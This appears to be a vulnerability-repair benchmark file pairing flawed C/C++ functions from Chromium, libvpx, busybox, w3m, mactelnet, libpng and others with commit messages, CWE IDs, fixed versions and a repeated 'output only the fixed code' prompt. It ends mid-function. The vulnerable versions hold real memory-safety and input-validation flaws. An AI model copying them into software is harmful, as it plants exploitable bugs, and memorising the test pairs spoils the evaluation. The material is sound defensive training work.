Code: void AudioNode::Dispose() { DCHECK(IsMainThread()); #if DEBUG_AUDIONODE_REFERENCES fprintf(stderr, "[%16p]: %16p: %2d: AudioNode::dispose %16p\n", context(), this, Handler().GetNodeType(), handler_.get()); #endif BaseAudioContext::GraphAutoLocker locker(context()); Handler().Dispose(); if (context()->HasRealtimeConstraint()) { context()->GetDeferredTaskHandler().AddRenderingOrphanHandler( std::move(handler_)); } else { if (context()->ContextState() == BaseAudioContext::kRunning) { context()->GetDeferredTaskHandler().AddRenderingOrphanHandler( std::move(handler_)); } } } Commit Message: Revert "Keep AudioHandlers alive until they can be safely deleted." This reverts commit 071df33edf2c8b4375fa432a83953359f93ea9e4. Reason for revert: This CL seems to cause an AudioNode leak on the Linux leak bot. The log is: https://ci.chromium.org/buildbot/chromium.webkit/WebKit%20Linux%20Trusty%20Leak/14252 * webaudio/AudioNode/audionode-connect-method-chaining.html * webaudio/Panner/pannernode-basic.html * webaudio/dom-exceptions.html Original change's description: > Keep AudioHandlers alive until they can be safely deleted. > > When an AudioNode is disposed, the handler is also disposed. But add > the handler to the orphan list so that the handler stays alive until > the context can safely delete it. If we don't do this, the handler > may get deleted while the audio thread is processing the handler (due > to, say, channel count changes and such). > > For an realtime context, always save the handler just in case the > audio thread is running after the context is marked as closed (because > the audio thread doesn't instantly stop when requested). > > For an offline context, only need to do this when the context is > running because the context is guaranteed to be stopped if we're not > in the running state. Hence, there's no possibility of deleting the > handler while the graph is running. > > This is a revert of > https://chromium-review.googlesource.com/c/chromium/src/+/860779, with > a fix for the leak. > > Bug: 780919 > Change-Id: Ifb6b5fcf3fbc373f5779256688731245771da33c > Reviewed-on: https://chromium-review.googlesource.com/862723 > Reviewed-by: Hongchan Choi <hongchan@chromium.org> > Commit-Queue: Raymond Toy <rtoy@chromium.org> > Cr-Commit-Position: refs/heads/master@{#528829} TBR=rtoy@chromium.org,hongchan@chromium.org Change-Id: Ibf406bf6ed34ea1f03e86a64a1e5ba6de0970c6f No-Presubmit: true No-Tree-Checks: true No-Try: true Bug: 780919 Reviewed-on: https://chromium-review.googlesource.com/863402 Reviewed-by: Taiju Tsuiki <tzik@chromium.org> Commit-Queue: Taiju Tsuiki <tzik@chromium.org> Cr-Commit-Position: refs/heads/master@{#528888} CWE ID: CWE-416
void AudioNode::Dispose() { DCHECK(IsMainThread()); #if DEBUG_AUDIONODE_REFERENCES fprintf(stderr, "[%16p]: %16p: %2d: AudioNode::dispose %16p\n", context(), this, Handler().GetNodeType(), handler_.get()); #endif BaseAudioContext::GraphAutoLocker locker(context()); Handler().Dispose(); if (context()->ContextState() == BaseAudioContext::kRunning) { context()->GetDeferredTaskHandler().AddRenderingOrphanHandler( std::move(handler_)); } }
172,795
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: void RunMemCheck() { ACMRandom rnd(ACMRandom::DeterministicSeed()); const int count_test_block = 1000; DECLARE_ALIGNED_ARRAY(16, int16_t, input_block, kNumCoeffs); DECLARE_ALIGNED_ARRAY(16, int16_t, input_extreme_block, kNumCoeffs); DECLARE_ALIGNED_ARRAY(16, int16_t, output_ref_block, kNumCoeffs); DECLARE_ALIGNED_ARRAY(16, int16_t, output_block, kNumCoeffs); for (int i = 0; i < count_test_block; ++i) { for (int j = 0; j < kNumCoeffs; ++j) { input_block[j] = rnd.Rand8() - rnd.Rand8(); input_extreme_block[j] = rnd.Rand8() % 2 ? 255 : -255; } if (i == 0) for (int j = 0; j < kNumCoeffs; ++j) input_extreme_block[j] = 255; if (i == 1) for (int j = 0; j < kNumCoeffs; ++j) input_extreme_block[j] = -255; fwd_txfm_ref(input_extreme_block, output_ref_block, pitch_, tx_type_); REGISTER_STATE_CHECK(RunFwdTxfm(input_extreme_block, output_block, pitch_)); for (int j = 0; j < kNumCoeffs; ++j) { EXPECT_EQ(output_block[j], output_ref_block[j]); EXPECT_GE(4 * DCT_MAX_VALUE, abs(output_block[j])) << "Error: 16x16 FDCT has coefficient larger than 4*DCT_MAX_VALUE"; } } } Commit Message: Merge Conflict Fix CL to lmp-mr1-release for ag/849478 DO NOT MERGE - libvpx: Pull from upstream Current HEAD: 7105df53d7dc13d5e575bc8df714ec8d1da36b06 BUG=23452792 Change-Id: Ic78176fc369e0bacc71d423e0e2e6075d004aaec CWE ID: CWE-119
void RunMemCheck() { ACMRandom rnd(ACMRandom::DeterministicSeed()); const int count_test_block = 1000; DECLARE_ALIGNED(16, int16_t, input_extreme_block[kNumCoeffs]); DECLARE_ALIGNED(16, tran_low_t, output_ref_block[kNumCoeffs]); DECLARE_ALIGNED(16, tran_low_t, output_block[kNumCoeffs]); for (int i = 0; i < count_test_block; ++i) { // Initialize a test block with input range [-mask_, mask_]. for (int j = 0; j < kNumCoeffs; ++j) { input_extreme_block[j] = rnd.Rand8() % 2 ? mask_ : -mask_; } if (i == 0) { for (int j = 0; j < kNumCoeffs; ++j) input_extreme_block[j] = mask_; } else if (i == 1) { for (int j = 0; j < kNumCoeffs; ++j) input_extreme_block[j] = -mask_; } fwd_txfm_ref(input_extreme_block, output_ref_block, pitch_, tx_type_); ASM_REGISTER_STATE_CHECK(RunFwdTxfm(input_extreme_block, output_block, pitch_)); for (int j = 0; j < kNumCoeffs; ++j) { EXPECT_EQ(output_block[j], output_ref_block[j]); EXPECT_GE(4 * DCT_MAX_VALUE << (bit_depth_ - 8), abs(output_block[j])) << "Error: 16x16 FDCT has coefficient larger than 4*DCT_MAX_VALUE"; } } }
174,526
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: static void add_probe(const char *name) { struct module_entry *m; m = get_or_add_modentry(name); if (!(option_mask32 & (OPT_REMOVE | OPT_SHOW_DEPS)) && (m->flags & MODULE_FLAG_LOADED) && strncmp(m->modname, "symbol:", 7) == 0 ) { G.need_symbols = 1; } } Commit Message: CWE ID: CWE-20
static void add_probe(const char *name) { struct module_entry *m; /* * get_or_add_modentry() strips path from name and works * on remaining basename. * This would make "rmmod dir/name" and "modprobe dir/name" * to work like "rmmod name" and "modprobe name", * which is wrong, and can be abused via implicit modprobing: * "ifconfig /usbserial up" tries to modprobe netdev-/usbserial. */ if (strchr(name, '/')) bb_error_msg_and_die("malformed module name '%s'", name); m = get_or_add_modentry(name); if (!(option_mask32 & (OPT_REMOVE | OPT_SHOW_DEPS)) && (m->flags & MODULE_FLAG_LOADED) && strncmp(m->modname, "symbol:", 7) == 0 ) { G.need_symbols = 1; } }
165,398
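The add_probe fix refuses any module name containing a path separator, which is what made "ifconfig /usbserial up" trigger an implicit modprobe of an attacker-chosen name. The validation boils down to one predicate, sketched here with a made-up function name:

#include <stdbool.h>
#include <string.h>

/* A module name must be a bare basename: non-empty and free of '/'. */
static bool module_name_is_sane(const char *name)
{
    return name != NULL && *name != '\0' && strchr(name, '/') == NULL;
}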
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: w3m_exit(int i) { #ifdef USE_MIGEMO init_migemo(); /* close pipe to migemo */ #endif stopDownload(); deleteFiles(); #ifdef USE_SSL free_ssl_ctx(); #endif disconnectFTP(); #ifdef USE_NNTP disconnectNews(); #endif #ifdef __MINGW32_VERSION WSACleanup(); #endif exit(i); } Commit Message: Make temporary directory safely when ~/.w3m is unwritable CWE ID: CWE-59
w3m_exit(int i) { #ifdef USE_MIGEMO init_migemo(); /* close pipe to migemo */ #endif stopDownload(); deleteFiles(); #ifdef USE_SSL free_ssl_ctx(); #endif disconnectFTP(); #ifdef USE_NNTP disconnectNews(); #endif #ifdef __MINGW32_VERSION WSACleanup(); #endif #ifdef HAVE_MKDTEMP if (no_rc_dir && tmp_dir != rc_dir) if (rmdir(tmp_dir) != 0) { fprintf(stderr, "Can't remove temporary directory (%s)!\n", tmp_dir); exit(1); } #endif exit(i); }
169,345
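w3m_exit above now removes a per-session temporary directory, the counterpart of creating it safely with mkdtemp() when ~/.w3m is unwritable. A standalone sketch of the creation side — mkdtemp is POSIX, but the template path and helper name here are invented:

#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Create a private, unpredictable temp directory (mode 0700) and return its path. */
static char *make_private_tmpdir(void)
{
    char template_buf[] = "/tmp/w3m-XXXXXX";   /* mkdtemp rewrites the XXXXXX in place */

    if (mkdtemp(template_buf) == NULL) {
        perror("mkdtemp");
        return NULL;
    }
    return strdup(template_buf);   /* caller frees it and rmdir()s the directory on exit */
}

Because the directory name is random and created with owner-only permissions, a hostile local user cannot pre-create or symlink it the way they could a predictable path.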
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: static void handle_data_packet(struct mt_connection *curconn, struct mt_mactelnet_hdr *pkthdr, int data_len) { struct mt_mactelnet_control_hdr cpkt; struct mt_packet pdata; unsigned char *data = pkthdr->data; unsigned int act_size = 0; int got_user_packet = 0; int got_pass_packet = 0; int got_width_packet = 0; int got_height_packet = 0; int success; /* Parse first control packet */ success = parse_control_packet(data, data_len - MT_HEADER_LEN, &cpkt); while (success) { if (cpkt.cptype == MT_CPTYPE_BEGINAUTH) { int plen,i; if (!curconn->have_pass_salt) { for (i = 0; i < 16; ++i) { curconn->pass_salt[i] = rand() % 256; } curconn->have_pass_salt = 1; memset(curconn->trypassword, 0, sizeof(curconn->trypassword)); } init_packet(&pdata, MT_PTYPE_DATA, pkthdr->dstaddr, pkthdr->srcaddr, pkthdr->seskey, curconn->outcounter); plen = add_control_packet(&pdata, MT_CPTYPE_PASSSALT, (curconn->pass_salt), 16); curconn->outcounter += plen; send_udp(curconn, &pdata); /* Don't change the username after the state is active */ } else if (cpkt.cptype == MT_CPTYPE_USERNAME && curconn->state != STATE_ACTIVE) { memcpy(curconn->username, cpkt.data, act_size = (cpkt.length > MT_MNDP_MAX_STRING_SIZE - 1 ? MT_MNDP_MAX_STRING_SIZE - 1 : cpkt.length)); curconn->username[act_size] = 0; got_user_packet = 1; } else if (cpkt.cptype == MT_CPTYPE_TERM_WIDTH && cpkt.length >= 2) { unsigned short width; memcpy(&width, cpkt.data, 2); curconn->terminal_width = le16toh(width); got_width_packet = 1; } else if (cpkt.cptype == MT_CPTYPE_TERM_HEIGHT && cpkt.length >= 2) { unsigned short height; memcpy(&height, cpkt.data, 2); curconn->terminal_height = le16toh(height); got_height_packet = 1; } else if (cpkt.cptype == MT_CPTYPE_TERM_TYPE) { memcpy(curconn->terminal_type, cpkt.data, act_size = (cpkt.length > 30 - 1 ? 30 - 1 : cpkt.length)); curconn->terminal_type[act_size] = 0; } else if (cpkt.cptype == MT_CPTYPE_PASSWORD) { #if defined(__linux__) && defined(_POSIX_MEMLOCK_RANGE) mlock(curconn->trypassword, 17); #endif memcpy(curconn->trypassword, cpkt.data, 17); got_pass_packet = 1; } else if (cpkt.cptype == MT_CPTYPE_PLAINDATA) { /* relay data from client to shell */ if (curconn->state == STATE_ACTIVE && curconn->ptsfd != -1) { write(curconn->ptsfd, cpkt.data, cpkt.length); } } else { syslog(LOG_WARNING, _("(%d) Unhandeled control packet type: %d"), curconn->seskey, cpkt.cptype); } /* Parse next control packet */ success = parse_control_packet(NULL, 0, &cpkt); } if (got_user_packet && got_pass_packet) { user_login(curconn, pkthdr); } if (curconn->state == STATE_ACTIVE && (got_width_packet || got_height_packet)) { set_terminal_size(curconn->ptsfd, curconn->terminal_width, curconn->terminal_height); } } Commit Message: Merge pull request #20 from eyalitki/master 2nd round security fixes from eyalitki CWE ID: CWE-119
static void handle_data_packet(struct mt_connection *curconn, struct mt_mactelnet_hdr *pkthdr, int data_len) { struct mt_mactelnet_control_hdr cpkt; struct mt_packet pdata; unsigned char *data = pkthdr->data; unsigned int act_size = 0; int got_user_packet = 0; int got_pass_packet = 0; int got_width_packet = 0; int got_height_packet = 0; int success; /* Parse first control packet */ success = parse_control_packet(data, data_len - MT_HEADER_LEN, &cpkt); while (success) { if (cpkt.cptype == MT_CPTYPE_BEGINAUTH) { int plen,i; if (!curconn->have_pass_salt) { for (i = 0; i < 16; ++i) { curconn->pass_salt[i] = rand() % 256; } curconn->have_pass_salt = 1; memset(curconn->trypassword, 0, sizeof(curconn->trypassword)); } init_packet(&pdata, MT_PTYPE_DATA, pkthdr->dstaddr, pkthdr->srcaddr, pkthdr->seskey, curconn->outcounter); plen = add_control_packet(&pdata, MT_CPTYPE_PASSSALT, (curconn->pass_salt), 16); curconn->outcounter += plen; send_udp(curconn, &pdata); /* Don't change the username after the state is active */ } else if (cpkt.cptype == MT_CPTYPE_USERNAME && curconn->state != STATE_ACTIVE) { memcpy(curconn->username, cpkt.data, act_size = (cpkt.length > MT_MNDP_MAX_STRING_SIZE - 1 ? MT_MNDP_MAX_STRING_SIZE - 1 : cpkt.length)); curconn->username[act_size] = 0; got_user_packet = 1; } else if (cpkt.cptype == MT_CPTYPE_TERM_WIDTH && cpkt.length >= 2) { unsigned short width; memcpy(&width, cpkt.data, 2); curconn->terminal_width = le16toh(width); got_width_packet = 1; } else if (cpkt.cptype == MT_CPTYPE_TERM_HEIGHT && cpkt.length >= 2) { unsigned short height; memcpy(&height, cpkt.data, 2); curconn->terminal_height = le16toh(height); got_height_packet = 1; } else if (cpkt.cptype == MT_CPTYPE_TERM_TYPE) { memcpy(curconn->terminal_type, cpkt.data, act_size = (cpkt.length > 30 - 1 ? 30 - 1 : cpkt.length)); curconn->terminal_type[act_size] = 0; } else if (cpkt.cptype == MT_CPTYPE_PASSWORD && cpkt.length == 17) { #if defined(__linux__) && defined(_POSIX_MEMLOCK_RANGE) mlock(curconn->trypassword, 17); #endif memcpy(curconn->trypassword, cpkt.data, 17); got_pass_packet = 1; } else if (cpkt.cptype == MT_CPTYPE_PLAINDATA) { /* relay data from client to shell */ if (curconn->state == STATE_ACTIVE && curconn->ptsfd != -1) { write(curconn->ptsfd, cpkt.data, cpkt.length); } } else { syslog(LOG_WARNING, _("(%d) Unhandeled control packet type: %d, length: %d"), curconn->seskey, cpkt.cptype, cpkt.length); } /* Parse next control packet */ success = parse_control_packet(NULL, 0, &cpkt); } if (got_user_packet && got_pass_packet) { user_login(curconn, pkthdr); } if (curconn->state == STATE_ACTIVE && (got_width_packet || got_height_packet)) { set_terminal_size(curconn->ptsfd, curconn->terminal_width, curconn->terminal_height); } }
166,964
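The handle_data_packet fix only copies the password control packet when cpkt.length is exactly 17 — the size the trypassword buffer expects — instead of trusting whatever length the remote side claims. The core of that change, as a small sketch with hypothetical names:

#include <stdbool.h>
#include <stddef.h>
#include <string.h>

#define PASS_BLOB_LEN 17

struct session { unsigned char trypassword[PASS_BLOB_LEN]; };

/* Copy only when the packet carries exactly the expected number of bytes. */
static bool store_password_blob(struct session *s, const unsigned char *data, size_t len)
{
    if (len != PASS_BLOB_LEN)
        return false;
    memcpy(s->trypassword, data, PASS_BLOB_LEN);
    return true;
}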
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: const char* SegmentInfo::GetWritingAppAsUTF8() const { return m_pWritingAppAsUTF8; } Commit Message: libwebm: Pull from upstream Rolling mkvparser from upstream. Primarily for fixing a bug on parsing failures with certain Opus WebM files. Upstream commit hash of this pull: 574045edd4ecbeb802ee3f1d214b5510269852ae The diff is so huge because there were some style clean ups upstream. But it was ensured that there were no breaking changes when the style clean ups was done upstream. Change-Id: Ib6e907175484b4b0ae1b55ab39522ea3188ad039 CWE ID: CWE-119
const char* SegmentInfo::GetWritingAppAsUTF8() const { return m_pWritingAppAsUTF8; }
174,383
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: zsetstrokecolorspace(i_ctx_t * i_ctx_p) { int code; code = zswapcolors(i_ctx_p); if (code < 0) return code; /* Now, the actual continuation routine */ push_op_estack(setstrokecolorspace_cont); code = zsetcolorspace(i_ctx_p); if (code >= 0) return o_push_estack; return code; } Commit Message: CWE ID: CWE-119
zsetstrokecolorspace(i_ctx_t * i_ctx_p) { int code; es_ptr iesp = esp; /* preserve exec stack in case of error */ code = zswapcolors(i_ctx_p); if (code < 0) return code; /* Now, the actual continuation routine */ push_op_estack(setstrokecolorspace_cont); code = zsetcolorspace(i_ctx_p); if (code >= 0) return o_push_estack; /* Something went wrong, swap back to the non-stroking space and restore the exec stack */ esp = iesp; (void)zswapcolors(i_ctx_p); return code; }
164,700
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: image_transform_png_set_gray_to_rgb_mod(PNG_CONST image_transform *this, image_pixel *that, png_const_structp pp, PNG_CONST transform_display *display) { /* NOTE: we can actually pend the tRNS processing at this point because we * can correctly recognize the original pixel value even though we have * mapped the one gray channel to the three RGB ones, but in fact libpng * doesn't do this, so we don't either. */ if ((that->colour_type & PNG_COLOR_MASK_COLOR) == 0 && that->have_tRNS) image_pixel_add_alpha(that, &display->this); /* Simply expand the bit depth and alter the colour type as required. */ if (that->colour_type == PNG_COLOR_TYPE_GRAY) { /* RGB images have a bit depth at least equal to '8' */ if (that->bit_depth < 8) that->sample_depth = that->bit_depth = 8; /* And just changing the colour type works here because the green and blue * channels are being maintained in lock-step with the red/gray: */ that->colour_type = PNG_COLOR_TYPE_RGB; } else if (that->colour_type == PNG_COLOR_TYPE_GRAY_ALPHA) that->colour_type = PNG_COLOR_TYPE_RGB_ALPHA; this->next->mod(this->next, that, pp, display); } Commit Message: DO NOT MERGE Update libpng to 1.6.20 BUG:23265085 Change-Id: I85199805636d771f3597b691b63bc0bf46084833 (cherry picked from commit bbe98b40cda082024b669fa508931042eed18f82) CWE ID:
image_transform_png_set_gray_to_rgb_mod(const image_transform *this, image_pixel *that, png_const_structp pp, const transform_display *display) { /* NOTE: we can actually pend the tRNS processing at this point because we * can correctly recognize the original pixel value even though we have * mapped the one gray channel to the three RGB ones, but in fact libpng * doesn't do this, so we don't either. */ if ((that->colour_type & PNG_COLOR_MASK_COLOR) == 0 && that->have_tRNS) image_pixel_add_alpha(that, &display->this, 0/*!for background*/); /* Simply expand the bit depth and alter the colour type as required. */ if (that->colour_type == PNG_COLOR_TYPE_GRAY) { /* RGB images have a bit depth at least equal to '8' */ if (that->bit_depth < 8) that->sample_depth = that->bit_depth = 8; /* And just changing the colour type works here because the green and blue * channels are being maintained in lock-step with the red/gray: */ that->colour_type = PNG_COLOR_TYPE_RGB; } else if (that->colour_type == PNG_COLOR_TYPE_GRAY_ALPHA) that->colour_type = PNG_COLOR_TYPE_RGB_ALPHA; this->next->mod(this->next, that, pp, display); }
173,636
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: static __u8 *sp_report_fixup(struct hid_device *hdev, __u8 *rdesc, unsigned int *rsize) { if (*rsize >= 107 && rdesc[104] == 0x26 && rdesc[105] == 0x80 && rdesc[106] == 0x03) { hid_info(hdev, "fixing up Sunplus Wireless Desktop report descriptor\n"); rdesc[105] = rdesc[110] = 0x03; rdesc[106] = rdesc[111] = 0x21; } return rdesc; } Commit Message: HID: fix a couple of off-by-ones There are a few very theoretical off-by-one bugs in report descriptor size checking when performing a pre-parsing fixup. Fix those. Cc: stable@vger.kernel.org Reported-by: Ben Hawkes <hawkes@google.com> Reviewed-by: Benjamin Tissoires <benjamin.tissoires@redhat.com> Signed-off-by: Jiri Kosina <jkosina@suse.cz> CWE ID: CWE-119
static __u8 *sp_report_fixup(struct hid_device *hdev, __u8 *rdesc, unsigned int *rsize) { if (*rsize >= 112 && rdesc[104] == 0x26 && rdesc[105] == 0x80 && rdesc[106] == 0x03) { hid_info(hdev, "fixing up Sunplus Wireless Desktop report descriptor\n"); rdesc[105] = rdesc[110] = 0x03; rdesc[106] = rdesc[111] = 0x21; } return rdesc; }
166,375
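The sp_report_fixup change from *rsize >= 107 to *rsize >= 112 is a plain off-by-one repair: the fixup writes rdesc[111], and index 111 only exists when the descriptor holds at least 112 bytes. The rule generalizes to a tiny helper, sketched here with an invented name:

#include <stdbool.h>
#include <stddef.h>

/* Writing buf[idx] is safe only if the buffer holds at least idx + 1 bytes. */
static bool can_patch_byte(size_t size, size_t idx)
{
    return size >= idx + 1;     /* e.g. patching index 111 needs size >= 112 */
}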
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: bool DoCanonicalizePathComponent(const CHAR* source, const Component& component, char separator, CanonOutput* output, Component* new_component) { bool success = true; if (component.is_valid()) { if (separator) output->push_back(separator); new_component->begin = output->length(); int end = component.end(); for (int i = component.begin; i < end; i++) { UCHAR uch = static_cast<UCHAR>(source[i]); if (uch < 0x20 || uch >= 0x80) success &= AppendUTF8EscapedChar(source, &i, end, output); else output->push_back(static_cast<char>(uch)); } new_component->len = output->length() - new_component->begin; } else { new_component->reset(); } return success; } Commit Message: [url] Make path URL parsing more lax Parsing the path component of a non-special URL like javascript or data should not fail for invalid URL characters like \uFFFF. See this bit in the spec: https://url.spec.whatwg.org/#cannot-be-a-base-url-path-state Note: some failing WPTs are added which are because url parsing replaces invalid characters (e.g. \uFFFF) with the replacement char \uFFFD, when that isn't in the spec. Bug: 925614 Change-Id: I450495bfdfa68dc70334ebed16a3ecc0d5737e88 Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1551917 Reviewed-by: Mike West <mkwst@chromium.org> Commit-Queue: Charlie Harrison <csharrison@chromium.org> Cr-Commit-Position: refs/heads/master@{#648155} CWE ID: CWE-20
template <typename CHAR, typename UCHAR> void DoCanonicalizePathComponent(const CHAR* source, const Component& component, char separator, CanonOutput* output, Component* new_component) { if (component.is_valid()) { if (separator) output->push_back(separator); new_component->begin = output->length(); int end = component.end(); for (int i = component.begin; i < end; i++) { UCHAR uch = static_cast<UCHAR>(source[i]); if (uch < 0x20 || uch >= 0x80) AppendUTF8EscapedChar(source, &i, end, output); else output->push_back(static_cast<char>(uch)); } new_component->len = output->length() - new_component->begin; } else { new_component->reset(); } }
173,011
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: void FeatureInfo::InitializeFeatures() { std::string extensions_string(gl::GetGLExtensionsFromCurrentContext()); gfx::ExtensionSet extensions(gfx::MakeExtensionSet(extensions_string)); const char* version_str = reinterpret_cast<const char*>(glGetString(GL_VERSION)); const char* renderer_str = reinterpret_cast<const char*>(glGetString(GL_RENDERER)); gl_version_info_.reset( new gl::GLVersionInfo(version_str, renderer_str, extensions)); bool enable_es3 = IsWebGL2OrES3OrHigherContext(); bool has_pixel_buffers = gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile || gfx::HasExtension(extensions, "GL_ARB_pixel_buffer_object") || gfx::HasExtension(extensions, "GL_NV_pixel_buffer_object"); ScopedPixelUnpackBufferOverride scoped_pbo_override(has_pixel_buffers, 0); AddExtensionString("GL_ANGLE_translated_shader_source"); AddExtensionString("GL_CHROMIUM_async_pixel_transfers"); AddExtensionString("GL_CHROMIUM_bind_uniform_location"); AddExtensionString("GL_CHROMIUM_color_space_metadata"); AddExtensionString("GL_CHROMIUM_command_buffer_query"); AddExtensionString("GL_CHROMIUM_command_buffer_latency_query"); AddExtensionString("GL_CHROMIUM_copy_texture"); AddExtensionString("GL_CHROMIUM_deschedule"); AddExtensionString("GL_CHROMIUM_get_error_query"); AddExtensionString("GL_CHROMIUM_lose_context"); AddExtensionString("GL_CHROMIUM_pixel_transfer_buffer_object"); AddExtensionString("GL_CHROMIUM_rate_limit_offscreen_context"); AddExtensionString("GL_CHROMIUM_resize"); AddExtensionString("GL_CHROMIUM_resource_safe"); AddExtensionString("GL_CHROMIUM_strict_attribs"); AddExtensionString("GL_CHROMIUM_texture_mailbox"); AddExtensionString("GL_CHROMIUM_trace_marker"); AddExtensionString("GL_EXT_debug_marker"); AddExtensionString("GL_EXT_unpack_subimage"); AddExtensionString("GL_OES_vertex_array_object"); if (gfx::HasExtension(extensions, "GL_ANGLE_translated_shader_source")) { feature_flags_.angle_translated_shader_source = true; } bool enable_dxt1 = false; bool enable_dxt3 = false; bool enable_dxt5 = false; bool have_s3tc = gfx::HasExtension(extensions, "GL_EXT_texture_compression_s3tc"); bool have_dxt3 = have_s3tc || gfx::HasExtension(extensions, "GL_ANGLE_texture_compression_dxt3"); bool have_dxt5 = have_s3tc || gfx::HasExtension(extensions, "GL_ANGLE_texture_compression_dxt5"); if (gfx::HasExtension(extensions, "GL_EXT_texture_compression_dxt1") || gfx::HasExtension(extensions, "GL_ANGLE_texture_compression_dxt1") || have_s3tc) { enable_dxt1 = true; } if (have_dxt3) { enable_dxt3 = true; } if (have_dxt5) { enable_dxt5 = true; } if (enable_dxt1) { feature_flags_.ext_texture_format_dxt1 = true; AddExtensionString("GL_ANGLE_texture_compression_dxt1"); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGB_S3TC_DXT1_EXT); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT1_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGB_S3TC_DXT1_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT1_EXT); } if (enable_dxt3) { AddExtensionString("GL_ANGLE_texture_compression_dxt3"); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT3_EXT); validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT3_EXT); } if (enable_dxt5) { feature_flags_.ext_texture_format_dxt5 = true; AddExtensionString("GL_ANGLE_texture_compression_dxt5"); validators_.compressed_texture_format.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT5_EXT); 
validators_.texture_internal_format_storage.AddValue( GL_COMPRESSED_RGBA_S3TC_DXT5_EXT); } bool have_astc = gfx::HasExtension(extensions, "GL_KHR_texture_compression_astc_ldr"); if (have_astc) { feature_flags_.ext_texture_format_astc = true; AddExtensionString("GL_KHR_texture_compression_astc_ldr"); GLint astc_format_it = GL_COMPRESSED_RGBA_ASTC_4x4_KHR; GLint astc_format_max = GL_COMPRESSED_RGBA_ASTC_12x12_KHR; for (; astc_format_it <= astc_format_max; astc_format_it++) { validators_.compressed_texture_format.AddValue(astc_format_it); validators_.texture_internal_format_storage.AddValue(astc_format_it); } astc_format_it = GL_COMPRESSED_SRGB8_ALPHA8_ASTC_4x4_KHR; astc_format_max = GL_COMPRESSED_SRGB8_ALPHA8_ASTC_12x12_KHR; for (; astc_format_it <= astc_format_max; astc_format_it++) { validators_.compressed_texture_format.AddValue(astc_format_it); validators_.texture_internal_format_storage.AddValue(astc_format_it); } } bool have_atc = gfx::HasExtension(extensions, "GL_AMD_compressed_ATC_texture") || gfx::HasExtension(extensions, "GL_ATI_texture_compression_atitc"); if (have_atc) { feature_flags_.ext_texture_format_atc = true; AddExtensionString("GL_AMD_compressed_ATC_texture"); validators_.compressed_texture_format.AddValue(GL_ATC_RGB_AMD); validators_.compressed_texture_format.AddValue( GL_ATC_RGBA_INTERPOLATED_ALPHA_AMD); validators_.texture_internal_format_storage.AddValue(GL_ATC_RGB_AMD); validators_.texture_internal_format_storage.AddValue( GL_ATC_RGBA_INTERPOLATED_ALPHA_AMD); } if (gfx::HasExtension(extensions, "GL_EXT_texture_filter_anisotropic")) { AddExtensionString("GL_EXT_texture_filter_anisotropic"); validators_.texture_parameter.AddValue(GL_TEXTURE_MAX_ANISOTROPY_EXT); validators_.g_l_state.AddValue(GL_MAX_TEXTURE_MAX_ANISOTROPY_EXT); } bool enable_depth_texture = false; GLenum depth_texture_format = GL_NONE; if (!workarounds_.disable_depth_texture && (gfx::HasExtension(extensions, "GL_ARB_depth_texture") || gfx::HasExtension(extensions, "GL_OES_depth_texture") || gfx::HasExtension(extensions, "GL_ANGLE_depth_texture") || gl_version_info_->is_desktop_core_profile)) { enable_depth_texture = true; depth_texture_format = GL_DEPTH_COMPONENT; feature_flags_.angle_depth_texture = gfx::HasExtension(extensions, "GL_ANGLE_depth_texture"); } if (enable_depth_texture) { AddExtensionString("GL_CHROMIUM_depth_texture"); AddExtensionString("GL_GOOGLE_depth_texture"); validators_.texture_internal_format.AddValue(GL_DEPTH_COMPONENT); validators_.texture_format.AddValue(GL_DEPTH_COMPONENT); validators_.pixel_type.AddValue(GL_UNSIGNED_SHORT); validators_.pixel_type.AddValue(GL_UNSIGNED_INT); validators_.texture_depth_renderable_internal_format.AddValue( GL_DEPTH_COMPONENT); } GLenum depth_stencil_texture_format = GL_NONE; if (gfx::HasExtension(extensions, "GL_EXT_packed_depth_stencil") || gfx::HasExtension(extensions, "GL_OES_packed_depth_stencil") || gl_version_info_->is_es3 || gl_version_info_->is_desktop_core_profile) { AddExtensionString("GL_OES_packed_depth_stencil"); feature_flags_.packed_depth24_stencil8 = true; if (enable_depth_texture) { if (gl_version_info_->is_es3) { depth_stencil_texture_format = GL_DEPTH24_STENCIL8; } else { depth_stencil_texture_format = GL_DEPTH_STENCIL; } validators_.texture_internal_format.AddValue(GL_DEPTH_STENCIL); validators_.texture_format.AddValue(GL_DEPTH_STENCIL); validators_.pixel_type.AddValue(GL_UNSIGNED_INT_24_8); validators_.texture_depth_renderable_internal_format.AddValue( 